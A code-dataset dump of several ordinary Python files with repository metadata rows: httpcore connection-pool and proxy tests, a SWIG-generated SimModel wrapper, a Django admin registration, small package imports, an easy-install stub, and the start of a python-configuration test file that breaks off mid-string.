] | null | null | null | tests/sync_tests/test_interfaces.py | simonw/httpcore | e3fc57660731f586cffab8a6f9fb0fdd69b7e344 | [
"BSD-3-Clause"
] | null | null | null | import ssl
import typing
import pytest
import httpcore
def read_body(stream: httpcore.SyncByteStream) -> bytes:
try:
body = []
for chunk in stream:
body.append(chunk)
return b"".join(body)
finally:
stream.close()
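`read_body` drains a byte stream chunk by chunk and guarantees `close()` runs even if iteration raises. The same try/finally pattern can be illustrated with a stand-in stream object (a sketch, not httpcore's `SyncByteStream`):

```python
class FakeStream:
    """Stand-in for a byte stream: iterable chunks plus a close() hook."""

    def __init__(self, chunks):
        self._chunks = chunks
        self.closed = False

    def __iter__(self):
        return iter(self._chunks)

    def close(self):
        self.closed = True

def read_body(stream):
    """Concatenate all chunks, closing the stream no matter what."""
    try:
        return b"".join(chunk for chunk in stream)
    finally:
        stream.close()
```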
def test_http_request() -> None:
with httpcore.SyncConnectionPool() as http:
method = b"GET"
url = (b"http", b"example.org", 80, b"/")
headers = [(b"host", b"example.org")]
http_version, status_code, reason, headers, stream = http.request(
method, url, headers
)
body = read_body(stream)
assert http_version == b"HTTP/1.1"
assert status_code == 200
assert reason == b"OK"
assert len(http._connections[url[:3]]) == 1 # type: ignore
def test_https_request() -> None:
with httpcore.SyncConnectionPool() as http:
method = b"GET"
url = (b"https", b"example.org", 443, b"/")
headers = [(b"host", b"example.org")]
http_version, status_code, reason, headers, stream = http.request(
method, url, headers
)
body = read_body(stream)
assert http_version == b"HTTP/1.1"
assert status_code == 200
assert reason == b"OK"
assert len(http._connections[url[:3]]) == 1 # type: ignore
def test_http2_request() -> None:
with httpcore.SyncConnectionPool(http2=True) as http:
method = b"GET"
url = (b"https", b"example.org", 443, b"/")
headers = [(b"host", b"example.org")]
http_version, status_code, reason, headers, stream = http.request(
method, url, headers
)
body = read_body(stream)
assert http_version == b"HTTP/2"
assert status_code == 200
assert reason == b"OK"
assert len(http._connections[url[:3]]) == 1 # type: ignore
def test_closing_http_request() -> None:
with httpcore.SyncConnectionPool() as http:
method = b"GET"
url = (b"http", b"example.org", 80, b"/")
headers = [(b"host", b"example.org"), (b"connection", b"close")]
http_version, status_code, reason, headers, stream = http.request(
method, url, headers
)
body = read_body(stream)
assert http_version == b"HTTP/1.1"
assert status_code == 200
assert reason == b"OK"
assert url[:3] not in http._connections # type: ignore
def test_http_request_reuse_connection() -> None:
with httpcore.SyncConnectionPool() as http:
method = b"GET"
url = (b"http", b"example.org", 80, b"/")
headers = [(b"host", b"example.org")]
http_version, status_code, reason, headers, stream = http.request(
method, url, headers
)
body = read_body(stream)
assert http_version == b"HTTP/1.1"
assert status_code == 200
assert reason == b"OK"
assert len(http._connections[url[:3]]) == 1 # type: ignore
method = b"GET"
url = (b"http", b"example.org", 80, b"/")
headers = [(b"host", b"example.org")]
http_version, status_code, reason, headers, stream = http.request(
method, url, headers
)
body = read_body(stream)
assert http_version == b"HTTP/1.1"
assert status_code == 200
assert reason == b"OK"
assert len(http._connections[url[:3]]) == 1 # type: ignore
def test_https_request_reuse_connection() -> None:
with httpcore.SyncConnectionPool() as http:
method = b"GET"
url = (b"https", b"example.org", 443, b"/")
headers = [(b"host", b"example.org")]
http_version, status_code, reason, headers, stream = http.request(
method, url, headers
)
body = read_body(stream)
assert http_version == b"HTTP/1.1"
assert status_code == 200
assert reason == b"OK"
assert len(http._connections[url[:3]]) == 1 # type: ignore
method = b"GET"
url = (b"https", b"example.org", 443, b"/")
headers = [(b"host", b"example.org")]
http_version, status_code, reason, headers, stream = http.request(
method, url, headers
)
body = read_body(stream)
assert http_version == b"HTTP/1.1"
assert status_code == 200
assert reason == b"OK"
assert len(http._connections[url[:3]]) == 1 # type: ignore
def test_http_request_cannot_reuse_dropped_connection() -> None:
with httpcore.SyncConnectionPool() as http:
method = b"GET"
url = (b"http", b"example.org", 80, b"/")
headers = [(b"host", b"example.org")]
http_version, status_code, reason, headers, stream = http.request(
method, url, headers
)
body = read_body(stream)
assert http_version == b"HTTP/1.1"
assert status_code == 200
assert reason == b"OK"
assert len(http._connections[url[:3]]) == 1 # type: ignore
# Mock the connection as having been dropped.
connection = list(http._connections[url[:3]])[0] # type: ignore
connection.is_connection_dropped = lambda: True
method = b"GET"
url = (b"http", b"example.org", 80, b"/")
headers = [(b"host", b"example.org")]
http_version, status_code, reason, headers, stream = http.request(
method, url, headers
)
body = read_body(stream)
assert http_version == b"HTTP/1.1"
assert status_code == 200
assert reason == b"OK"
assert len(http._connections[url[:3]]) == 1 # type: ignore
@pytest.mark.parametrize("proxy_mode", ["DEFAULT", "FORWARD_ONLY", "TUNNEL_ONLY"])
def test_http_proxy(
proxy_server: typing.Tuple[bytes, bytes, int], proxy_mode: str
) -> None:
method = b"GET"
url = (b"http", b"example.org", 80, b"/")
headers = [(b"host", b"example.org")]
max_connections = 1
max_keepalive = 2
with httpcore.SyncHTTPProxy(
proxy_server,
proxy_mode=proxy_mode,
max_connections=max_connections,
max_keepalive=max_keepalive,
) as http:
http_version, status_code, reason, headers, stream = http.request(
method, url, headers
)
body = read_body(stream)
assert http_version == b"HTTP/1.1"
assert status_code == 200
assert reason == b"OK"
# mitmproxy does not support forwarding HTTPS requests
@pytest.mark.parametrize("proxy_mode", ["DEFAULT", "TUNNEL_ONLY"])
@pytest.mark.parametrize("http2", [False, True])
def test_proxy_https_requests(
proxy_server: typing.Tuple[bytes, bytes, int],
ca_ssl_context: ssl.SSLContext,
proxy_mode: str,
http2: bool,
) -> None:
method = b"GET"
url = (b"https", b"example.org", 443, b"/")
headers = [(b"host", b"example.org")]
max_connections = 1
max_keepalive = 2
with httpcore.SyncHTTPProxy(
proxy_server,
proxy_mode=proxy_mode,
ssl_context=ca_ssl_context,
max_connections=max_connections,
max_keepalive=max_keepalive,
http2=http2,
) as http:
http_version, status_code, reason, headers, stream = http.request(
method, url, headers
)
_ = read_body(stream)
assert http_version == (b"HTTP/2" if http2 else b"HTTP/1.1")
assert status_code == 200
assert reason == b"OK"
@pytest.mark.parametrize(
"http2,expected",
[
(False, ["HTTP/1.1, ACTIVE", "HTTP/1.1, ACTIVE"]),
(True, ["HTTP/2, ACTIVE, 2 streams"]),
],
)
def test_connection_pool_get_connection_info(http2, expected) -> None:
with httpcore.SyncConnectionPool(http2=http2) as http:
method = b"GET"
url = (b"https", b"example.org", 443, b"/")
headers = [(b"host", b"example.org")]
for _ in range(2):
_ = http.request(method, url, headers)
stats = http.get_connection_info()
assert stats == {"https://example.org": expected}
| 31.272374 | 82 | 0.588652 | 1,008 | 8,037 | 4.550595 | 0.10119 | 0.058862 | 0.06235 | 0.036843 | 0.819054 | 0.794637 | 0.769784 | 0.754524 | 0.731851 | 0.723567 | 0 | 0.02324 | 0.277218 | 8,037 | 256 | 83 | 31.394531 | 0.766397 | 0.029737 | 0 | 0.686275 | 0 | 0 | 0.096351 | 0 | 0 | 0 | 0 | 0 | 0.230392 | 1 | 0.053922 | false | 0 | 0.019608 | 0 | 0.078431 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
d4eb0ec2d3c0017e839ae331eefdaf9c38b51735 | 11,364 | py | Python | SimModel_Python_API/simmodel_swig/Release/SimGeomSurfaceModel_FaceBasedSurfaceModel_Default.py | EnEff-BIM/EnEffBIM-Framework | 6328d39b498dc4065a60b5cc9370b8c2a9a1cddf | [
"MIT"
] | 3 | 2016-05-30T15:12:16.000Z | 2022-03-22T08:11:13.000Z | SimModel_Python_API/simmodel_swig/Release/SimGeomSurfaceModel_FaceBasedSurfaceModel_Default.py | EnEff-BIM/EnEffBIM-Framework | 6328d39b498dc4065a60b5cc9370b8c2a9a1cddf | [
"MIT"
] | 21 | 2016-06-13T11:33:45.000Z | 2017-05-23T09:46:52.000Z | SimModel_Python_API/simmodel_swig/Release/SimGeomSurfaceModel_FaceBasedSurfaceModel_Default.py | EnEff-BIM/EnEffBIM-Framework | 6328d39b498dc4065a60b5cc9370b8c2a9a1cddf | [
"MIT"
] | null | null | null | # This file was automatically generated by SWIG (http://www.swig.org).
# Version 3.0.7
#
# Do not make changes to this file unless you know what you are doing--modify
# the SWIG interface file instead.
from sys import version_info
if version_info >= (2, 6, 0):
def swig_import_helper():
from os.path import dirname
import imp
fp = None
try:
fp, pathname, description = imp.find_module('_SimGeomSurfaceModel_FaceBasedSurfaceModel_Default', [dirname(__file__)])
except ImportError:
import _SimGeomSurfaceModel_FaceBasedSurfaceModel_Default
return _SimGeomSurfaceModel_FaceBasedSurfaceModel_Default
if fp is not None:
try:
_mod = imp.load_module('_SimGeomSurfaceModel_FaceBasedSurfaceModel_Default', fp, pathname, description)
finally:
fp.close()
return _mod
_SimGeomSurfaceModel_FaceBasedSurfaceModel_Default = swig_import_helper()
del swig_import_helper
else:
import _SimGeomSurfaceModel_FaceBasedSurfaceModel_Default
del version_info
try:
    _swig_property = property
except NameError:
    pass  # Python < 2.2 doesn't have 'property'.


def _swig_setattr_nondynamic(self, class_type, name, value, static=1):
    if (name == "thisown"):
        return self.this.own(value)
    if (name == "this"):
        if type(value).__name__ == 'SwigPyObject':
            self.__dict__[name] = value
            return
    method = class_type.__swig_setmethods__.get(name, None)
    if method:
        return method(self, value)
    if (not static):
        if _newclass:
            object.__setattr__(self, name, value)
        else:
            self.__dict__[name] = value
    else:
        raise AttributeError("You cannot add attributes to %s" % self)
def _swig_setattr(self, class_type, name, value):
    return _swig_setattr_nondynamic(self, class_type, name, value, 0)


def _swig_getattr_nondynamic(self, class_type, name, static=1):
    if (name == "thisown"):
        return self.this.own()
    method = class_type.__swig_getmethods__.get(name, None)
    if method:
        return method(self)
    if (not static):
        return object.__getattr__(self, name)
    else:
        raise AttributeError(name)


def _swig_getattr(self, class_type, name):
    return _swig_getattr_nondynamic(self, class_type, name, 0)


def _swig_repr(self):
    try:
        strthis = "proxy of " + self.this.__repr__()
    except Exception:
        strthis = ""
    return "<%s.%s; %s >" % (self.__class__.__module__, self.__class__.__name__, strthis,)

try:
    _object = object
    _newclass = 1
except AttributeError:
    class _object:
        pass
    _newclass = 0

try:
    import weakref
    weakref_proxy = weakref.proxy
except Exception:
    weakref_proxy = lambda x: x
import base


class SimGeomSurfaceModel(base.SimGeometricRepresentationItem):
    __swig_setmethods__ = {}
    for _s in [base.SimGeometricRepresentationItem]:
        __swig_setmethods__.update(getattr(_s, '__swig_setmethods__', {}))
    __setattr__ = lambda self, name, value: _swig_setattr(self, SimGeomSurfaceModel, name, value)
    __swig_getmethods__ = {}
    for _s in [base.SimGeometricRepresentationItem]:
        __swig_getmethods__.update(getattr(_s, '__swig_getmethods__', {}))
    __getattr__ = lambda self, name: _swig_getattr(self, SimGeomSurfaceModel, name)
    __repr__ = _swig_repr

    def __init__(self, *args):
        this = _SimGeomSurfaceModel_FaceBasedSurfaceModel_Default.new_SimGeomSurfaceModel(*args)
        try:
            self.this.append(this)
        except Exception:
            self.this = this

    def _clone(self, f=0, c=None):
        return _SimGeomSurfaceModel_FaceBasedSurfaceModel_Default.SimGeomSurfaceModel__clone(self, f, c)
    __swig_destroy__ = _SimGeomSurfaceModel_FaceBasedSurfaceModel_Default.delete_SimGeomSurfaceModel
    __del__ = lambda self: None
SimGeomSurfaceModel_swigregister = _SimGeomSurfaceModel_FaceBasedSurfaceModel_Default.SimGeomSurfaceModel_swigregister
SimGeomSurfaceModel_swigregister(SimGeomSurfaceModel)
class SimGeomSurfaceModel_FaceBasedSurfaceModel(SimGeomSurfaceModel):
    __swig_setmethods__ = {}
    for _s in [SimGeomSurfaceModel]:
        __swig_setmethods__.update(getattr(_s, '__swig_setmethods__', {}))
    __setattr__ = lambda self, name, value: _swig_setattr(self, SimGeomSurfaceModel_FaceBasedSurfaceModel, name, value)
    __swig_getmethods__ = {}
    for _s in [SimGeomSurfaceModel]:
        __swig_getmethods__.update(getattr(_s, '__swig_getmethods__', {}))
    __getattr__ = lambda self, name: _swig_getattr(self, SimGeomSurfaceModel_FaceBasedSurfaceModel, name)
    __repr__ = _swig_repr

    def FbsmFaces(self, *args):
        return _SimGeomSurfaceModel_FaceBasedSurfaceModel_Default.SimGeomSurfaceModel_FaceBasedSurfaceModel_FbsmFaces(self, *args)

    def __init__(self, *args):
        this = _SimGeomSurfaceModel_FaceBasedSurfaceModel_Default.new_SimGeomSurfaceModel_FaceBasedSurfaceModel(*args)
        try:
            self.this.append(this)
        except Exception:
            self.this = this

    def _clone(self, f=0, c=None):
        return _SimGeomSurfaceModel_FaceBasedSurfaceModel_Default.SimGeomSurfaceModel_FaceBasedSurfaceModel__clone(self, f, c)
    __swig_destroy__ = _SimGeomSurfaceModel_FaceBasedSurfaceModel_Default.delete_SimGeomSurfaceModel_FaceBasedSurfaceModel
    __del__ = lambda self: None
SimGeomSurfaceModel_FaceBasedSurfaceModel_swigregister = _SimGeomSurfaceModel_FaceBasedSurfaceModel_Default.SimGeomSurfaceModel_FaceBasedSurfaceModel_swigregister
SimGeomSurfaceModel_FaceBasedSurfaceModel_swigregister(SimGeomSurfaceModel_FaceBasedSurfaceModel)
class SimGeomSurfaceModel_FaceBasedSurfaceModel_Default(SimGeomSurfaceModel_FaceBasedSurfaceModel):
    __swig_setmethods__ = {}
    for _s in [SimGeomSurfaceModel_FaceBasedSurfaceModel]:
        __swig_setmethods__.update(getattr(_s, '__swig_setmethods__', {}))
    __setattr__ = lambda self, name, value: _swig_setattr(self, SimGeomSurfaceModel_FaceBasedSurfaceModel_Default, name, value)
    __swig_getmethods__ = {}
    for _s in [SimGeomSurfaceModel_FaceBasedSurfaceModel]:
        __swig_getmethods__.update(getattr(_s, '__swig_getmethods__', {}))
    __getattr__ = lambda self, name: _swig_getattr(self, SimGeomSurfaceModel_FaceBasedSurfaceModel_Default, name)
    __repr__ = _swig_repr

    def __init__(self, *args):
        this = _SimGeomSurfaceModel_FaceBasedSurfaceModel_Default.new_SimGeomSurfaceModel_FaceBasedSurfaceModel_Default(*args)
        try:
            self.this.append(this)
        except Exception:
            self.this = this

    def _clone(self, f=0, c=None):
        return _SimGeomSurfaceModel_FaceBasedSurfaceModel_Default.SimGeomSurfaceModel_FaceBasedSurfaceModel_Default__clone(self, f, c)
    __swig_destroy__ = _SimGeomSurfaceModel_FaceBasedSurfaceModel_Default.delete_SimGeomSurfaceModel_FaceBasedSurfaceModel_Default
    __del__ = lambda self: None
SimGeomSurfaceModel_FaceBasedSurfaceModel_Default_swigregister = _SimGeomSurfaceModel_FaceBasedSurfaceModel_Default.SimGeomSurfaceModel_FaceBasedSurfaceModel_Default_swigregister
SimGeomSurfaceModel_FaceBasedSurfaceModel_Default_swigregister(SimGeomSurfaceModel_FaceBasedSurfaceModel_Default)
class SimGeomSurfaceModel_FaceBasedSurfaceModel_Default_sequence(base.sequence_common):
    __swig_setmethods__ = {}
    for _s in [base.sequence_common]:
        __swig_setmethods__.update(getattr(_s, '__swig_setmethods__', {}))
    __setattr__ = lambda self, name, value: _swig_setattr(self, SimGeomSurfaceModel_FaceBasedSurfaceModel_Default_sequence, name, value)
    __swig_getmethods__ = {}
    for _s in [base.sequence_common]:
        __swig_getmethods__.update(getattr(_s, '__swig_getmethods__', {}))
    __getattr__ = lambda self, name: _swig_getattr(self, SimGeomSurfaceModel_FaceBasedSurfaceModel_Default_sequence, name)
    __repr__ = _swig_repr

    def __init__(self, *args):
        this = _SimGeomSurfaceModel_FaceBasedSurfaceModel_Default.new_SimGeomSurfaceModel_FaceBasedSurfaceModel_Default_sequence(*args)
        try:
            self.this.append(this)
        except Exception:
            self.this = this

    def assign(self, n, x):
        return _SimGeomSurfaceModel_FaceBasedSurfaceModel_Default.SimGeomSurfaceModel_FaceBasedSurfaceModel_Default_sequence_assign(self, n, x)

    def begin(self, *args):
        return _SimGeomSurfaceModel_FaceBasedSurfaceModel_Default.SimGeomSurfaceModel_FaceBasedSurfaceModel_Default_sequence_begin(self, *args)

    def end(self, *args):
        return _SimGeomSurfaceModel_FaceBasedSurfaceModel_Default.SimGeomSurfaceModel_FaceBasedSurfaceModel_Default_sequence_end(self, *args)

    def rbegin(self, *args):
        return _SimGeomSurfaceModel_FaceBasedSurfaceModel_Default.SimGeomSurfaceModel_FaceBasedSurfaceModel_Default_sequence_rbegin(self, *args)

    def rend(self, *args):
        return _SimGeomSurfaceModel_FaceBasedSurfaceModel_Default.SimGeomSurfaceModel_FaceBasedSurfaceModel_Default_sequence_rend(self, *args)

    def at(self, *args):
        return _SimGeomSurfaceModel_FaceBasedSurfaceModel_Default.SimGeomSurfaceModel_FaceBasedSurfaceModel_Default_sequence_at(self, *args)

    def front(self, *args):
        return _SimGeomSurfaceModel_FaceBasedSurfaceModel_Default.SimGeomSurfaceModel_FaceBasedSurfaceModel_Default_sequence_front(self, *args)

    def back(self, *args):
        return _SimGeomSurfaceModel_FaceBasedSurfaceModel_Default.SimGeomSurfaceModel_FaceBasedSurfaceModel_Default_sequence_back(self, *args)

    def push_back(self, *args):
        return _SimGeomSurfaceModel_FaceBasedSurfaceModel_Default.SimGeomSurfaceModel_FaceBasedSurfaceModel_Default_sequence_push_back(self, *args)

    def pop_back(self):
        return _SimGeomSurfaceModel_FaceBasedSurfaceModel_Default.SimGeomSurfaceModel_FaceBasedSurfaceModel_Default_sequence_pop_back(self)

    def detach_back(self, pop=True):
        return _SimGeomSurfaceModel_FaceBasedSurfaceModel_Default.SimGeomSurfaceModel_FaceBasedSurfaceModel_Default_sequence_detach_back(self, pop)

    def insert(self, *args):
        return _SimGeomSurfaceModel_FaceBasedSurfaceModel_Default.SimGeomSurfaceModel_FaceBasedSurfaceModel_Default_sequence_insert(self, *args)

    def erase(self, *args):
        return _SimGeomSurfaceModel_FaceBasedSurfaceModel_Default.SimGeomSurfaceModel_FaceBasedSurfaceModel_Default_sequence_erase(self, *args)

    def detach(self, position, r, erase=True):
        return _SimGeomSurfaceModel_FaceBasedSurfaceModel_Default.SimGeomSurfaceModel_FaceBasedSurfaceModel_Default_sequence_detach(self, position, r, erase)

    def swap(self, x):
        return _SimGeomSurfaceModel_FaceBasedSurfaceModel_Default.SimGeomSurfaceModel_FaceBasedSurfaceModel_Default_sequence_swap(self, x)
    __swig_destroy__ = _SimGeomSurfaceModel_FaceBasedSurfaceModel_Default.delete_SimGeomSurfaceModel_FaceBasedSurfaceModel_Default_sequence
    __del__ = lambda self: None
SimGeomSurfaceModel_FaceBasedSurfaceModel_Default_sequence_swigregister = _SimGeomSurfaceModel_FaceBasedSurfaceModel_Default.SimGeomSurfaceModel_FaceBasedSurfaceModel_Default_sequence_swigregister
SimGeomSurfaceModel_FaceBasedSurfaceModel_Default_sequence_swigregister(SimGeomSurfaceModel_FaceBasedSurfaceModel_Default_sequence)
# This file is compatible with both classic and new-style classes.
| 45.638554 | 196 | 0.775783 | 1,082 | 11,364 | 7.562847 | 0.134011 | 0.415496 | 0.407797 | 0.193572 | 0.746303 | 0.696688 | 0.649028 | 0.596969 | 0.518636 | 0.445436 | 0 | 0.001773 | 0.156459 | 11,364 | 248 | 197 | 45.822581 | 0.851867 | 0.025871 | 0 | 0.407216 | 1 | 0 | 0.030199 | 0.009042 | 0 | 0 | 0 | 0 | 0 | 1 | 0.149485 | false | 0.010309 | 0.056701 | 0.108247 | 0.530928 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 6 |
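The generated proxy classes above route every attribute access through per-class `__swig_setmethods__` / `__swig_getmethods__` tables. A minimal pure-Python sketch of that dispatch pattern, with `Point` and its `x` accessors as illustrative stand-ins (they are not part of the SWIG module):

```python
# Sketch of classic SWIG proxy attribute dispatch, with no SWIG dependency.
def swig_setattr(self, class_type, name, value):
    # look up a generated setter for this attribute name
    method = class_type.__swig_setmethods__.get(name, None)
    if method:
        return method(self, value)
    # fall back to normal attribute assignment for unknown names
    object.__setattr__(self, name, value)

class Point(object):
    # hypothetical accessor tables; generated code fills these with C wrappers
    __swig_setmethods__ = {"x": lambda self, v: self.__dict__.__setitem__("_x", float(v))}
    __swig_getmethods__ = {"x": lambda self: self.__dict__["_x"]}
    __setattr__ = lambda self, name, value: swig_setattr(self, Point, name, value)

    def __getattr__(self, name):
        method = Point.__swig_getmethods__.get(name, None)
        if method:
            return method(self)
        raise AttributeError(name)

p = Point()
p.x = 3          # routed through __swig_setmethods__["x"]
print(p.x)       # -> 3.0
```

The real generated code adds inheritance handling (the `for _s in [...]` loops that merge base-class tables) on top of this same lookup.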
be0ef28ce1fc0291a42cd99f32b01f61d466ea81 | 144 | py | Python | stores/apps/lots/admin.py | diassor/CollectorCity-Market-Place | 892ad220b8cf1c0fc7433f625213fe61729522b2 | [
"Apache-2.0"
] | 135 | 2015-03-19T13:28:18.000Z | 2022-03-27T06:41:42.000Z | stores/apps/lots/admin.py | dfcoding/CollectorCity-Market-Place | e59acec3d600c049323397b17cae14fdcaaaec07 | [
"Apache-2.0"
] | null | null | null | stores/apps/lots/admin.py | dfcoding/CollectorCity-Market-Place | e59acec3d600c049323397b17cae14fdcaaaec07 | [
"Apache-2.0"
] | 83 | 2015-01-30T01:00:15.000Z | 2022-03-08T17:25:10.000Z | from models import Lot, ImageLot, BidHistory
from django.contrib import admin
admin.site.register(Lot)
admin.site.register(ImageLot)
admin.site.register(BidHistory)
| 16 | 32 | 0.805556 | 20 | 144 | 5.8 | 0.55 | 0.232759 | 0.439655 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.097222 | 144 | 8 | 33 | 18 | 0.892308 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.4 | 0 | 0.4 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 6 |
078e0b2672dacb4b76bb648966c385829c38dd74 | 43 | py | Python | Python/deepfetal/deepfetal/unit/__init__.py | lcorgra/RGDSVR | 46b0b707a797902a5330d6bd5c73bb6fcec01aba | [
"MIT"
] | null | null | null | Python/deepfetal/deepfetal/unit/__init__.py | lcorgra/RGDSVR | 46b0b707a797902a5330d6bd5c73bb6fcec01aba | [
"MIT"
] | null | null | null | Python/deepfetal/deepfetal/unit/__init__.py | lcorgra/RGDSVR | 46b0b707a797902a5330d6bd5c73bb6fcec01aba | [
"MIT"
] | null | null | null | from .decoder import *
from .atac import *
| 14.333333 | 22 | 0.72093 | 6 | 43 | 5.166667 | 0.666667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.186047 | 43 | 2 | 23 | 21.5 | 0.885714 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
0792496935ab4210fc4b75f4185aae8d94bf9eeb | 65 | py | Python | qpip/__init__.py | vongostev/QPIP | f19fac9a22cbca0d80a20bc55d57d5c97f296fc4 | [
"MIT"
] | 1 | 2021-02-28T16:41:47.000Z | 2021-02-28T16:41:47.000Z | qpip/__init__.py | vongostev/QPIP | f19fac9a22cbca0d80a20bc55d57d5c97f296fc4 | [
"MIT"
] | 1 | 2021-04-20T22:12:46.000Z | 2021-04-20T22:12:46.000Z | qpip/__init__.py | vongostev/QPIP | f19fac9a22cbca0d80a20bc55d57d5c97f296fc4 | [
"MIT"
] | null | null | null | from .epscon import *
from .denoise import *
from .moms import *
| 16.25 | 22 | 0.723077 | 9 | 65 | 5.222222 | 0.555556 | 0.425532 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.184615 | 65 | 3 | 23 | 21.666667 | 0.886792 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
07a8d666606606e1bfa28670b50f4002ecb12cea | 181 | py | Python | Scripts/rst2odt.py | saranya515/python-api | 9870b064c1238845b3e6714c8116e3c949868c62 | [
"bzip2-1.0.6"
] | null | null | null | Scripts/rst2odt.py | saranya515/python-api | 9870b064c1238845b3e6714c8116e3c949868c62 | [
"bzip2-1.0.6"
] | null | null | null | Scripts/rst2odt.py | saranya515/python-api | 9870b064c1238845b3e6714c8116e3c949868c62 | [
"bzip2-1.0.6"
] | null | null | null | #!C:\Python27\python.exe
# EASY-INSTALL-SCRIPT: 'docutils==0.12','rst2odt.py'
__requires__ = 'docutils==0.12'
__import__('pkg_resources').run_script('docutils==0.12', 'rst2odt.py')
| 36.2 | 70 | 0.723757 | 26 | 181 | 4.653846 | 0.653846 | 0.223141 | 0.272727 | 0.280992 | 0.429752 | 0.429752 | 0 | 0 | 0 | 0 | 0 | 0.075581 | 0.049724 | 181 | 4 | 71 | 45.25 | 0.627907 | 0.40884 | 0 | 0 | 0 | 0 | 0.485714 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.5 | 0 | 0.5 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 6 |
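The easy-install stub above works because `__import__('pkg_resources')` returns the imported module object, so the `run_script` call can be chained in one line. The same one-line import-and-call pattern, shown with the stdlib `math` module instead of pkg_resources:

```python
# __import__(name) imports a module and returns the module object, allowing
# an attribute call to be chained without a separate import statement.
root = __import__("math").sqrt(16.0)
print(root)  # -> 4.0
```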
07b7d3ee8f425a7242a0b1637d8e188acab8a205 | 25,190 | py | Python | tests/test_configuration_set.py | Frank5000/python-configuration | daecc89ce704dd043c00748de7aa62185ae739eb | [
"MIT"
] | 51 | 2019-03-01T07:24:35.000Z | 2022-03-28T15:14:11.000Z | tests/test_configuration_set.py | Frank5000/python-configuration | daecc89ce704dd043c00748de7aa62185ae739eb | [
"MIT"
] | 57 | 2019-07-05T20:08:32.000Z | 2022-03-03T14:58:42.000Z | tests/test_configuration_set.py | Frank5000/python-configuration | daecc89ce704dd043c00748de7aa62185ae739eb | [
"MIT"
] | 22 | 2019-07-05T15:55:18.000Z | 2021-12-02T10:23:12.000Z | from config import (
    config_from_dict,
    config_from_env,
    config_from_python,
    create_path_from_config,
    Configuration,
    ConfigurationSet,
    config,
)

import os
import json

try:
    import yaml
except ImportError:
    yaml = None  # type: ignore
try:
    import toml
except ImportError:
    toml = None  # type: ignore

import pytest
DICT1 = {
    "a1.B1.c1": 1,
    "a1.b1.C2": 2,
    "A1.b1.c3": 3,
    "a1.b2.c1": "a",
    "a1.b2.c2": True,
    "a1.b2.c3": 1.1,
}
DICT2_1 = {"a2.b1.c1": "f", "a2.b1.c2": False, "a2.B1.c3": None}
DICT2_2 = {"a2.b2.c1": 10, "a2.b2.c2": "YWJjZGVmZ2g=", "a2.b2.C3": "abcdefgh"}
DICT3_1 = {
    "a2.b2.c1": 10,
    "a2.b2.c2": "YWJjZGVmZ2g=",
    "a2.b2.C3": "abcdefgh",
    "z1": 100,
}
DICT3_2 = {"a2": 10, "z1.w2": 123, "z1.w3": "abc"}
DICT3_3 = {"a2.g2": 10, "a2.w2": 123, "a2.w3": "abc"}

DICT3 = {
    "a3.b1.c1": "af",
    "a3.b1.c2": True,
    "a3.b1.c3": None,
    "a3.b2.c1": 104,
    "a3.b2.c2": "YWJjZGVmZ2g=",
    "a3.b2.c3": "asdfdsbcdefgh",
}
JSON = json.dumps(DICT3)

DICT4 = {
    "a3.b1.c1": "afsdf",
    "a3.b1.c2": False,
    "a3.b1.c3": None,
    "a3.b2.c1": 107,
    "a3.b2.c2": "YWsdfsJjZGVmZ2g=",
    "a3.b2.c3": "asdfdssdfbcdefgh",
}
JSON2 = json.dumps(DICT4)
if yaml:
    YAML = """
z1:
    w1: 1
    w2: null
    w3: abc
z2:
    w1: 1.1
    w2:
        - a
        - b
        - c
    w3:
        p1: 1
        p2: 5.4
"""
    DICT_YAML = {
        "z1.w1": 1,
        "z1.w2": None,
        "z1.w3": "abc",
        "z2.w1": 1.1,
        "z2.w2": ["a", "b", "c"],
        "z2.w3": {"p1": 1, "p2": 5.4},
    }
if toml:
    TOML = """
[owner]
name = "ABC"

[database]
server = "192.168.1.1"
ports = [ 8001, 8001, 8002,]
connection_max = 5000
